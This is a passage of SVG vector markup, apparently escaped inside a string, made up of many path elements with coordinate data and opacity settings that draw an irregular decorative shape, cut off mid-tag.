d=\"M565.79,29.66c.06-1.93-.63-4.54,2.58-4.94-1.36-3.09-2.72-.45-3.76.19s-1.65,1.89-2.45,2.88c.21-2.7-.49-6.21,3.19-6.42,5.16-.29,9.71-4.39,15.25-2.3.42.15,1.4-1.2,2.12-1.86-3.88-.15-7.73-1.19-11.6.57-2.71,1.23-6,1.38-8.43,3-1.57,1-2.22,3.68-2.88,5.74-.33,1.07.65,2.59.25,3.58A4.58,4.58,0,0,1,557.24,32c-.34.1-1.7-1.43-1.62-2.1a49.65,49.65,0,0,1,1.49-6.3A3.94,3.94,0,0,0,554.27,25c-.57.65-.81,1.6-1.41,2.19-2.5,2.45-2.2,7.69,1.09,8.56,2.94.79,6.48.12,9.56-.67C565.92,34.5,565.73,31.88,565.79,29.66Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M590,17.37c2.15,1.32,4.17.62,5.05-2.05-3-.28-6-.64-9-.8-1.78-.1-3.49.23-3.33,2.69C585.19,16.1,587.47,15.79,590,17.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M523.5,50.6l-6.22-.66C519.18,51.84,521.13,53.28,523.5,50.6Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M544.57,52.59l4.79-.53-6.14-.22Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M539.19,51.31H535Q537.09,54.13,539.19,51.31Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M674.64,5.51c3.24,2.44,6.72,1.7,10.21.74C681.62,3.7,678.1,5,674.64,5.51Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M621.45,9.64l-4,.6C619,11.45,620.43,12,621.45,9.64Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M557.51,52l3.44.5C560,51.14,558.9,50.51,557.51,52Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M678,35.46l-1.27,0c-2,.15-4.63-2.1-5.91,1.06-.88,2.19-.79,4.75,1.62,5.94,1.26.62,3.1,0,4.67,0C676.91,40.05,681.62,38.29,678,35.46Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M642,34.88l-1.44,2.06,2.08,3.75c-5.91.72-7,.08-6.56-3.72q.84-2.46,1.7-4.92L642,33.53c0-1,.27-2.25-.21-3a42.76,42.76,0,0,0-3.9-4.46c-5.63,3.6-4.11,9.68-5.71,14.76,3.08.93,5.82,1.68,8.51,2.58,1.68.55,2.88.21,2.71-1.65A63.89,63.89,0,0,0,642,34.88Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M654.52,37.15c-3-1-4.73.23-5.47,3.53a46,46,0,0,0,5.11,3.74,2.69,2.69,0,0,0,2.54-.71C658,41.13,656.79,37.88,654.52,37.15Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M380.12,72.88h1.16l2.19-5.26-6.27.06Q378.67,70.29,380.12,72.88Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M395.07,63.86l-.15.12c1.42.52,2.34.41,3-.09l-.49.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1664.81,72.6c-3.76.14-6.25-1-5.79-5.51-8.24.44-12.2-4.51-14.84-10.85l-5-.11,1.38-4.74L1637.29,50l-1.19-.25-2.21,3.28c-3.28,0-6.71-.25-10.11,0-2.36.17-3.93-.55-5-2.57-2.3.18-4.39.65-4.6,3.8-3.45-1.88-5.94.25-8.64,1.62-2.88,1.45-5.82,2.79-8.73,4.18,0,3.7-3.85,4.65-5.47,7.21-.19.3-2.22-.56-4.11-1.08a5,5,0,0,1-1.9,1.28c-1.07.3-2.75.47-3.42-.14-2.52-2.26-4.74-4.86-7.28-7.57L1569.3,64c.26.79.58,1.71,1,3-4.84,0-8.94-.8-11.86-4.8-1-1.44-4.38-.65-5.42,1.28-.62,1.15-1,2.4-1.61,3.69-3.49-1.8-6.64-2.52-10.12.2l-1-6.9-1.73,1a28.62,28.62,0,0,1-.39,3.35,3,3,0,0,1-5,1.65c-3.85-3.61-4.45-3.68-8.87-1a9.11,9.11,0,0,1-1.13.48c-.07-1.6.41-3.62-.34-4.33-1-.89-2.92-.69-4.44-1a11.3,11.3,0,0,0-3-.6,4.21,4.21,0,0,0-2.82,1.14c-3,4.1-5.26,4.64-9.73,2.09a38.14,38.14,0,0,0-3.73-1.53l3.55,4.65c-3.76-.14-5.79-1.6-7.27-3.65-1.3-1.8-2.32-2.25-4.45-1.1-3.31,1.78-6.88,3.07-10.48,4.63l-1.82-2.69c-1.9.35-2.84,4-5.56,1.39.28-.32.56-.59.8-.9.67-.86,1.71-1.67,1.85-2.62.09-.57-1.27-1.93-1.92-1.9a3.45,3.45,0,0,0-2.45,1.77c-.94,2.21-2.11,3.13-4.3,1.57l-3.38,4-2.57-3.17L1458,65.6l-.72-.38c.4-1.32.81-2.64,1.36-4.43a8.88,8.88,0,0,0-1.73,1.1c-2.58,2.82-2.2,2.48-4.89-.34-1.6-1.68-4.57-2.06-7.18-3.14l-2.06,6-6.73-4.13-1.95,4.61c-3.35-1.89-1.19-4.44-1.42-6.94l-3.06,1.52c-2.06-4.1-5.47-6.59-8.27-6l0,0c0,1.45,0,2.91-.17,4.35s-.11,3.36-.89,3.8a24.34,24.34,0,0,1-7.85,3c-.84.14-2.57-2-3-3.39-.92-2.73-2.66-2.19-3.72-.87-1.66,2.07-3,3.61-5.78,1.86-.4-.25-1.47.59-3,1.26.28-3.12.52-5.88.78-8.8-3.9.23-4.2,4.76-6.84,7.06l2.77.25c-.3,2.21-.58,4.37-.9,6.79-4.36,1.6-8.33,1-12-3.82-.45,2.68-.71,4.27-1,5.86l-1.23,0-.09-5.57c-4.85-.22-5.88-1.3-7.45-7.5a10.27,10.27,0,0,0-1.53-2.56c-.86.79-2.06,1.42-2.52,2.39a.8.8,0,0,0-.07.2,17.91,17.91,0,0,0,3.35.38,31.12,31.12,0,0,1-2.69,4.41,7.22,7.22,0,0,0-.73-.83,7,7,0,0,0,2.45,3.09,4.87,4.87,0,0,1,1.22,2c.26.57.23,1.69.54,1.77,4.24,1.08,3.72,5.67,6.08,8.1a3.78,3.78,0,0,1,.28,1.17c4.9,1.81,11.61,0,7.49,7.22.93,0,1.86,1.46,2.78,1.5a1.93,1.93,0,0,0,1.31-1.52c0-.09.18-.23.25-.21,4.15.85,5.2-1.72,6-5,.1-.38,2.77-.11,5.19-.16.64-1.69,1.6-4.22,2.34-6.2,2.16-.59,4-1,5.69-1.6,2.08-.75,3.19-.5,3.27,2a2.8,2.8,0,0,0,4.42,2.37l2-1.18,1.72-1.08c.23.8.41,1.44.59,2.08l4.49-1.27c.76-3.18,4.75-6.31,7.59-5.52,1,.27,1.55,1.92,2.32,3,2.69-.45,5.41-.82,8.09-1.36,4.48-.92,9.45,2.06,13.59-1.73.22-.21.86.05,1.31.08a27.18,27.18,0,0,0,5,.23c2.43-.32,4.79-1.43,7.21-1.5,7.3-.21,14.6-.08,21.91-.07,3.35.46,6.71.91,10.06,1.38l4-.22c1.29-.37,2.7-1.28,3.85-1,3.3.72,6.47,2.06,9.62-.47a3.24,3.24,0,0,1,2.29-.3c5.84.94,11.67,1.9,17.49,3a11.89,11.89,0,0,1,2.91,1.47l1.34-.12a7.76,7.76,0,0,1,2.34-1c3.41-.24,6.83-.33,10.25-.46a.46.46,0,0,1,.33.07c5.27,4.14,11.33.27,17,2l3,5.61c2.23-3.22-.92-7.65,3.41-8.37,2.25.11,4.63-.19,6.71.47,1.82.57,4.56.94,4.14,4.18a15.57,15.57,0,0,0,.45,3.63l3.83-.53c-.31-1-1-2.12-.76-2.82.37-1,2-2.38,2.25-2.23,2.63,1.6,3-.55,4.13-3,3.4,2,6.75,3.57,9.72,5.7,2,1.42,3.35.52,5-.2,2-3.33,3.3-3.71,6.5-2.07a36,36,0,0,0,3.67,1.4c1.91-4.84,8.35-7.47,13.09-5.71a10.29,10.29,0,0,0,3.93.58c2.66-.1,4.6.16,5.78,3.26s3.55,1.73,5.58-.06c5.34,4.46,11.13,7.37,18.27,5.13-.56-1.46-1.13-2.92-1.69-4.37C1668.51,72.76,1666.65,72.53,1664.81,72.6Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1350.53,53.61a12.91,12.91,0,0,1,5.93.69c.72.26,2-.44,2.76-1a12.13,12.13,0,0,0,2-2.32c.51,2.08,1,3.92,1.4,5.67l1.88.53a13.59,13.59,0,0,0,.91-3.92,7.69,7.69,0,0,0-1.12-4.78c-3.86-5.23-3.61-8.25,1.59-12.2l-1-2.41-3.27,1.17c-1.39,3.27-4.58,2.18-7,2.88l-4.15.64-2.78,5.82c.14.88.27,1.75.41,2.62,1.78,1.32.75,2.12-.54,2.86-1.6.92-3.2,1.82-4.8,2.73l.07.06,1.06,0A24.11,24.11,0,0,1,1350.53,53.61Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1363.39,59.73l.08-.16-.13-.06Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1904.67,105c-4.63-4.2-8.58-9.71-16.11-8.24a1.27,1.27,0,0,1-.94-.32c-2.87-2.78-5.66-2-8.11.22-2.16-1.59-3.91-3.38-6-4.25-1.51-.62-4-.66-5.22.23-2.55,1.92-5.26,1.35-7.94,1.61-.49,0-1.34-.59-1.46-.44-2.78,3.3-4.85.39-7.25-.82l-.95,1.13-8-.57,1.62,1.88,1.31-.09,3.89.68a27.36,27.36,0,0,0,5.26.81c3.42-.11,6.85-.51,10.26-.92a6.53,6.53,0,0,0,2.39-1.06c2.51-1.5,4.93-.16,5.11,2.8a7.37,7.37,0,0,0,.4,1.8c3.42-.78,6.66-2.57,9.08-1.79,2.83.9,5.25.33,7.87.48,1.77.1,4.3.69,5.07,1.94C1897.6,104.32,1899.41,105.54,1904.67,105Zm-54-10.88Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1779.25,94.49c-.56-.77-1.56-2.16-2.4-3.34L1772,94.69l-7.26-7.64c-.54,1.71-.92,2.92-1.59,5l-5-5.65-1,3.54c-2.11-1.68-4-3.19-5.9-4.71l-.63.64c.37,1.73.75,3.47,1.12,5.2a6.41,6.41,0,0,1,1.94-.09c4.59,1.21,9.17,2.43,13.71,3.79a12.94,12.94,0,0,1,2.87,1.77c3-1.41,6-3.41,9,0l1.22-.18c1.74-.63,3.55-1.15,5.23-1.93,2.21-1,4.32-2.27,6.47-3.43-2.52.6-5,1.14-7.54,1.8C1783,93.24,1781.29,93.84,1779.25,94.49Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1712.48,80.52c-2.44,2.26-4.44,1-6.69.37-1.71-.45-3.42-.87-5.13-1.31l.38.94c-1.25.82-2.67,2.51-3.7,2.3a26.81,26.81,0,0,1-7-3A28.61,28.61,0,0,0,1675,76.56l-1.76.73a2.52,2.52,0,0,1,.08.55c2.37.33,4.74.68,7.12,1,.54.07,1.18-.17,1.65,0,2.47,1.08,4.91,2.26,7.36,3.4L1692,82c1.18.3,2.57.3,3.5,1,2.19,1.5,4.06,2,6.39.17,1-.73,2.92-1.24,3.82-.74,4.17,2.29,8-.62,12-.33C1716.35,80.15,1714.05,79.07,1712.48,80.52Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1899.35,115.9l0,0c.09.56.18,1.13.28,1.7,2.05-.79,4.27-.89,7.51.73,0-1.07,0-2,.05-2.8A10.94,10.94,0,0,0,1899.35,115.9Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1836.36,93.51a2.14,2.14,0,0,1-2.07.29c-3-2.07-7.49-2.27-8.52-6.81-.06-.27-.72-.4-1-.53a13.68,13.68,0,0,1-2.71,2.53c-2.28,1.15-4.69,2-7.06,3l4.21.73,1.28-.88,2.63-.37c1.11-.09,2.37-.56,3.3-.2,3,1.16,6,2.63,8.94,4l3.23-1,2.65-1.15C1839.51,91.87,1837.9,91.28,1836.36,93.51Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1727.53,82.77c-2,1.34-7.35,1.1-9.59-.42-.6,3.09,1.11,3.46,3.55,3.09,6-.94,11.13.12,13.86,6.49.34.8,1.84,1.12,2.81,1.66-1.94-3.06-4-6.07-5.79-9.2C1731.16,82.33,1729.86,81.22,1727.53,82.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1795.58,90.34l4.15,5.71,3.54.31,2-.34-.12-1.32A15.34,15.34,0,0,1,1795.58,90.34Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1743.5,89.25c-1,.45-1.29,2.49-1.89,3.84l3-3,4,3.33,2.54-1.61c-1.19-.39-2.39-.76-3.57-1.19C1746.11,90.13,1744.42,88.82,1743.5,89.25Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1807.27,89.45c-.13,1.85-.21,3-.29,4.23l2.87,1,3.18-2C1810.42,94,1809.32,90.83,1807.27,89.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1813,92.69a5.39,5.39,0,0,0,.68-.43Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1741.6,93.1l-2.77.67C1740.15,95.2,1741.08,95,1741.6,93.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1793.51,90.08l1.31-.27-1.08-1.71C1793.62,89.11,1793.56,89.6,1793.51,90.08Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1380.52,59.15c2.15,1.79,3.21.94,5.41-4.5a45.93,45.93,0,0,0-3.11-5.31c-.66-.85-2-1.21-3-1.79-.22,1-.94,2.3-.57,3,1.18,2.42.69,4.27-1.13,6.07l-3.17-.95-1.07.76,2.7,4.92Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1362.6,59.18c-1.5-.63-3.34-.38-5-.73-4.94-1.05-9.84-3-14.78-3.07-4.45-.06-8.28-1.57-12.35-2.59-.47-.11-.85-.6-1.27-.91l-1.29-.41c-.71-.12-8.9,11-9.52,10.67-16.28-9.53-32-9.06-39.59,8.59-1.77,4.08-5.83,4.23-10.7,3,.88,2.86,3.27,1.83,5.35,1.7,4.06-.25,8.11-.74,12.16-.66,7,.15,13.29-5.28,20.49-5.78,4.87-.34,7.63-5.18,12.53-4.58,2.64.33,12.67-10,15.23-9.32,4.88,1.38,9.82,2.69,14.55,4.5A46.36,46.36,0,0,1,1358.72,65a35,35,0,0,1,3.57,3,27.72,27.72,0,0,0,5.24-5.44A11.18,11.18,0,0,0,1362.6,59.18Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1265.91,71.75a4.27,4.27,0,0,1-2.24.72c1.53.5,3,1,4.45,1.31a6,6,0,0,1-.16-.67C1267.84,72.52,1266.21,71.56,1265.91,71.75Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1228.49,66a13.19,13.19,0,0,0-4-.24c-2.93,0-5.88.15-8.8-.06-7-.51-13.91-1.31-20.88-1.76-6.08-.39-12.18-.55-18.27-.68-7.89-.18-15.79-.24-23.68-.32-4,0-8.08-.08-12.12,0-2.11,0-4.22.37-6.33.54a5.91,5.91,0,0,1-2.61,0c-3.66-1.62-7-1-10.37.87-.75,1.58-1.48,1.55-2.2,0l-1.22,0-2.47,2.29a30.58,30.58,0,0,1-3-4.62c-.44-1-.08-2.38-.81-4l-2.85,3c-.14-.28-.53-.73-.43-1,2-4.41-.9-6.44-4-8.29a3.72,3.72,0,0,0-2.5-.41c-6.11,1.53-6.11,1.57-9.09-4.29a30,30,0,0,1-1.2-2.79c-1.64-4.42-1.64-4.43-5.69-2.55-2.35,2.71-3.09,2.61-4.89-.69l-4,.59-.45,1.1-.86-.65-6.19,1.23c-1.52,1.88-3,3.62-5.75,1.69-.59-.41-2.09.22-3,.67a19,19,0,0,0-2.82,2l-2,.7c-.44,3.32-3.51,2.53-5.46,3.49l5,4.48a74.68,74.68,0,0,0,4.52-7c2-3.94,5.19-1.66,7.81-2.26l.54,1-6,4.6c3.36.48,5.89,1.22,8.44-.93,1-.87,2.82-.88,4.28-1.19,1-.22,2.4.09,3.1-.48,2.25-1.84,4.36-.89,5.7.66.68.79-.24,3-.5,5l9.51,3.68c-.43,1.15-.94,2.51-1.44,3.87,3,0,5.92-.2,8.84.05,4.21.35,8.52,0,12.2,3.2,2,1.71,4.78,2.65,7.38,3.28,1.4.33,3.81-.24,4.58-1.28,1.7-2.31,4.35-3.72,6.47-1.89s3.4,1,5.06-.56,3.53-2,5.67,0c1.06,1,3,1.06,4.62,1.22,2,.2,4,0,6.53,0,2.43-2.7,6-.62,9.34-.88,1.77-.13,3.65.36,5.32-.07,3.63-.91,7.06-1.14,10.22,1.17,3.44,2.51,5.13,2.45,8.17-.26a3.89,3.89,0,0,1,2.32-1c3.09,0,6.18.25,9.26.49,5.39.41,10.85,1.66,16.14,1.17,10-.92,18.81,3.75,28.26,5.23a40,40,0,0,0,6,0c0-.36,0-.72,0-1.08a4.5,4.5,0,0,0,6.73-.29,3.33,3.33,0,0,1,4-1.08c1.67.53,3.29,1.64,5.08,1.59-5.4-1.8-11.22-4.2-15.81-4.32C1241.28,68,1234.8,68.2,1228.49,66ZM1092.16,55.67a.55.55,0,0,1-.52-.22c-.06-.14.13-.37.21-.56l.57.24C1092.34,55.32,1092.3,55.62,1092.16,55.67Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M539.19,51.31q-2.1,2.82-4.2,0l-4-.08-3.36,3.83-2.17-4.4-1.93-.06c-2.37,2.68-4.32,1.24-6.22-.66l-7.43-.1c-2.26.12-4.6.67-6.75.24-3.3-.67-4.17-.36-4.77,3.15.57,1.38,1.14,2.77,1.91,4.62l-5.83.32L493.47,60q-1.26,3.79-2.53,7.59c0,.68-.06,1.35-.08,2,.19.68.39,1.35.59,2l2-1.35c0-4-.33-8.25,4.45-9.92,2.53-.89,3.32-2.36,3.13-4.81a33.14,33.14,0,0,1,.16-3.84c1.47.38,2.59.64,3.69,1,1.27.38,2.53,1.23,3.77,1.19,6.47-.24,11.1,2.17,12.94,8.66.8,2.81,2.64,4,5.32,4.32-.43-2.48-2.15-5.21,1.37-6.9-.4-3,2.15-5.88,5.72-6a10.91,10.91,0,0,1,5.51,1c3.26,1.92,4.15,0,5.06-2.42l-1.35-.75Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M407.63,65c.19-.78-1.11-1.93-1.73-2.91a19.22,19.22,0,0,1,3.79,2.16,10.51,10.51,0,0,0,2.88,2,15.17,15.17,0,0,1,3.2-.36h.3a6.77,6.77,0,0,0,1.27-1.29c-.56-.2-1.17-.24-1.49-.56s-.91-.87-1.33-1.33l-8.81-1.17a5.59,5.59,0,0,1-1.37.82c-.65.16-1.31.3-2,.45a4.38,4.38,0,0,0-.43,1.49,3.89,3.89,0,0,1,2.34,1.85h0a7.52,7.52,0,0,0,3.54.79A2.26,2.26,0,0,1,407.63,65Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M454.88,67.81c-7.81-1.91-16.06.63-23.59-2.89-.28-.13-.68,0-1,0l-9.62-1.27a10.5,10.5,0,0,0,1.83,2.4,32.85,32.85,0,0,1,11.19,1.73c3.6,1.33,7.7,1.37,11.59,1.87,4.35.56,8.78-.92,13.12,1.78,2.21,1.37,5.71.6,8.61,1a45.91,45.91,0,0,1,4.89,1.08c1.74.39,3.46.79,3.94-1.71l-.77-1.08C468.32,69.73,461.44,69.41,454.88,67.81Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M397.39,64l.22.08a1.81,1.81,0,0,0,.27-.18Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M596.54,47.52c-3.67,1.37-7.25,3-10.31,4.27L580,49.12l-1.23.66a31.65,31.65,0,0,1-4.27,2.07,48.3,48.3,0,0,1-5.4,1.12c0,.32,0,.65,0,1,3.79-.66,7.76-1.87,9.71,4.77,1.76-8,5.42-2.43,8.15-2.87.34-.84.64-1.62,1-2.44l2.53,1-.27-1.12,4.74-2.09,2.78-2,1.33,0c0-.3,0-.59,0-.89C598.22,48,597.2,47.27,596.54,47.52Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M909.5,30.4l-1.33-.23-1.39,1.16,2.89.56C909.61,31.39,909.55,30.9,909.5,30.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M689.59,6.87l-4.74-.62c-3.49,1-7,1.7-10.21-.74-6.36.51-12.8.34-18.93,2.74a6,6,0,0,1-4.36-.58c-3.05-1.58-5.77-1.31-7.28,1.54-1.29,2.41-2.39,2.22-4,.46-2.08-2.26-4.24-2.5-6.83-.48-.89.69-2.6.4-3.94.43-2.61.05-5.23,0-7.84,0-1,2.33-2.46,1.81-4,.6l-2.63-.05L612,9.75l-1.3,0L607.9,11l-12.81,4.28c-.88,2.67-2.9,3.37-5.05,2.05-2.57-1.58-4.85-1.27-7.31-.16h0c-.72.66-1.7,2-2.12,1.86-5.54-2.09-10.09,2-15.25,2.3-3.68.21-3,3.72-3.19,6.42.8-1,1.43-2.26,2.45-2.88s2.4-3.28,3.76-.19l2,2.13,13.75-3.14c.89.15,2.16,2.24,3,2.08,2.76-.57,3.08.66,3.23,2.79,0,.66.88,1.26,1.35,1.89.36-1.6-.25-3,0-4.16a11,11,0,0,1,2.19-4c.2-.27,1.37.11,2.07.31,1.35.4,2.7,1.3,4,1.23,4.93-.28,7.66.7,8.81,6.51.47,2.41,1.78,3.41,4.28,3.14a28,28,0,0,1,4.47.2c3.43-.46,6.8-.75,9.24,2.5,1.42,1.89.87,5-1.31,5.25-2.74.29-3.43,1.48-3.32,3.92,0,.63-.76,1.29-1.17,1.94-.17.28-.31.8-.52.82-3.7.5-7.39,1-11.1,1.31a4.79,4.79,0,0,1-2.56-1.08c-2.14-1.42-4.24-2.19-6.42-.13,3.2,2.24,6.41,4.46,9.6,6.71.71.5,1.35,1.11,2,1.67l6.16-4.52,3.65,4.7,3.12-2.22,4.38-5.54,1.5.44c-.09,2-.23,3.94-.24,5.9,0,.73.15,1.89.58,2.07a2.66,2.66,0,0,0,2.33-.28c1.74-1.48,3.27-1.69,5.13-.2a13.22,13.22,0,0,0,3.1,1.4,29.4,29.4,0,0,0,.88-3.44,17.25,17.25,0,0,0-.21-3.11h-7c-.91-3.94,3.58-3.21,5.15-4.57,2.31-2,4.88-.07,6.74,2,5-5,3.8-5.21,12.22-.4l5.06-7.23c.48,2.19.72,3.3,1,4.78,2.1-4.3,2.88-4.3,5.73-1.12a7.44,7.44,0,0,0,4.27,2.35,45.42,45.42,0,0,0,10.16,0,5.08,5.08,0,0,0,3.59-2.81A5.3,5.3,0,0,0,688,40.43c-1.13-1.14-3.13-1.42-5-2.18-.5-2.48-1.7-4.39-5-2.79,3.6,2.83-1.11,4.59-.89,7-1.57,0-3.41.6-4.67,0-2.41-1.19-2.5-3.75-1.62-5.94,1.28-3.16,3.88-.91,5.91-1.06-.44-.78-.83-1.59-1.33-2.33-2.26-3.31-3.87-3.48-6.69-.82a6.4,6.4,0,0,1-2.42,1.67,62.13,62.13,0,0,1-6.15,1l-1.88-1.38-1.52,2h-8.27c1.33-5.28,2.68-10.65,4.11-16.31-4.69,1.4-3.38,6.54-6.6,9-.92-2.35-2.33-4.53-2.5-6.81-.14-2-.06-4.69,2.8-5.56,1.48-.45,3-.92,4.43-1.4s2.73-1,4.14-1.36c2.09-.51,4.21-.88,6.55-1.35l.93,2.22c4.46-4.06,8.06-7.14,15.18-6.16C686,9,694,12.55,702.68,11.92a1.92,1.92,0,0,1,1.27.45c3,2.56,4,.72,4.66-2,.21-.87.53-1.72.79-2.59-5.35,0-10.71,0-16.06-.09A20,20,0,0,1,689.59,6.87ZM654.52,37.15c2.27.73,3.48,4,2.18,6.56a2.69,2.69,0,0,1-2.54.71,46,46,0,0,1-5.11-3.74C649.79,37.38,651.49,36.18,654.52,37.15Zm-13.87,6.29c-2.69-.9-5.43-1.65-8.51-2.58,1.6-5.08.08-11.16,5.71-14.76a42.76,42.76,0,0,1,3.9,4.46c.48.72.17,2,.21,3,0,.45,0,.9,0,1.35a63.89,63.89,0,0,1,1.36,6.91C643.53,43.65,642.33,44,640.65,43.44Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M704.78,41.63c-.52,3.77-1.6,4.69-5.5,4.49,0-3.14,2.62-3.69,4.68-4.74a1,1,0,0,0,0-.49,30,30,0,0,0-4.4-3.71c-.91-.53-2.35-.11-3.55-.12,0,1.14,0,2.28,0,3.41s.79,2.16.45,2.9c-1.18,2.64-1.06,4.29,2.27,4.71a13.59,13.59,0,0,1,3.13,1.19L706,44.44c-.25-1-.5-2-.74-3A.67.67,0,0,0,704.78,41.63Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M394.46,63.7c-2.38-.94-4.73-2.35-7.16-2.52-2.15-.15-4.3-.15-6.46-.1l3.56,3.78c2,0,4.05,0,6.07,0l1.07-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M372.31,61.37c1,.48,2,.93,3,1.44,1.29.66,2.55,1.36,3.83,2h5.28l-3.56-3.78C378,61.15,375.15,61.31,372.31,61.37Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M800.56,9.76v4.17c1.09-.25,2.2-.45,3.28-.74,4.21-1.14,8.37-1.59,12.42.6l1.36,0L819,12.51a5.11,5.11,0,0,0-1.43-.7C811.89,11.1,806.22,10.44,800.56,9.76Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M790.24,10.21l4.23.85h2v-.69C794.45,9.12,792.39,7.81,790.24,10.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M560.88,52.66l.74,1.36,2,0,.81-1.24-.86-.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M535.05,70.31l1.39.76.68-.07c0-.71,0-1.42-.08-2.13Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M907.69,33.92a2.27,2.27,0,0,0-.64,1.7c.11.45,1.06,1.14,1.38,1,2-.74,3.93-1.67,5.89-2.54l-4.5-2.05A19.13,19.13,0,0,0,907.69,33.92Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M774.14,6.48c-7,.2-14.12-2-21.12.67-1.25.47-3-.51-4.53-.66-1.69-.16-3.39-.12-5.09-.17.06.21.12.62.18.62,3-.07,4.66,5.33,8.51,2.15.26-.22,1.08.12,1.59.33A12.36,12.36,0,0,0,764.73,9a7.7,7.7,0,0,1,4.15-1.16c4.94.7,9.81,1.86,14.74,2.64a23.59,23.59,0,0,0,4.87-.23c-.69-.5-1.32-1.28-2.08-1.44C782.34,7.86,778.21,6.36,774.14,6.48Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path 